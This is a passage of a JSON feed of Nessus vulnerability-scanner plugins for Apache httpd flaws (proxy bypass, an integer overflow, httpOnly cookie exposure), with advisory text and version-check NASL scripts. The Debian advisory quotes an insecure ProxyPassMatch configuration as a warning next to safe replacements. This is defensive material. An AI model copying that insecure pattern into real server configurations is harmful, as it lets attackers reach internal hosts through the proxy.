In certain reverse proxy configurations using the ProxyPassMatch directive or using the RewriteRule directive with the [P] flag, a remote attacker could make the proxy connect to an arbitrary server. This could allow the attacker to access internal servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same issue.\n\n Note that, even with this issue fixed, it is the responsibility of the administrator to ensure that the regular expression replacement pattern for the target URI does not allow a client to append arbitrary strings to the host or port parts of the target URI. For example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process to crash during shutdown. This is a violation of the privilege separation between the apache2 processes and could potentially be used to worsen the impact of other vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request) could be used to expose 'httpOnly' cookies. 
This could allow a remote attacker using cross site scripting to steal authentication cookies.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-07T00:00:00", "type": "nessus", "title": "Debian DSA-2405-1 : apache2 - multiple issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2405.NASL", "href": "https://www.tenable.com/plugins/nessus/57851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2405. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57851);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51706);\n script_xref(name:\"DSA\", value:\"2405\");\n\n script_name(english:\"Debian DSA-2405-1 : apache2 - multiple issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 
CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. 
This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2405\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version apache2 2.2.16-6+squeeze6\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. 
In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"apache2\", reference:\"2.2.9-10+lenny12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-dbg\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-doc\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-utils\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-bin\", reference:\"2.2.16-6+squeeze6\")) 
flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-common\", reference:\"2.2.16-6+squeeze6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:28", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. 
(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-16T00:00:00", "type": "nessus", "title": "CentOS 6 : httpd (CESA-2012:0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/57960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# CentOS Errata and Security Advisory 2012:0128 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57960);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"CentOS 6 : httpd (CESA-2012:0128)\");\n script_summary(english:\"Checks rpm output for the updated 
packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44f56a29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0031\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-15.el6.centos.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:30:05", "description": "From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. 
An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : httpd (ELSA-2012-0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/68458", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# Oracle Linux Security Advisory ELSA-2012-0128 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68458);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2012-0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response 
Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002606.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-15.0.1.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:36:40", "description": "It was discovered that the fix for CVE-2011-3368 did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. 
A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)", "cvss3": {"score": null, "vector": null}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2012-46)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-46.NASL", "href": "https://www.tenable.com/plugins/nessus/69653", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-46.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69653);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n 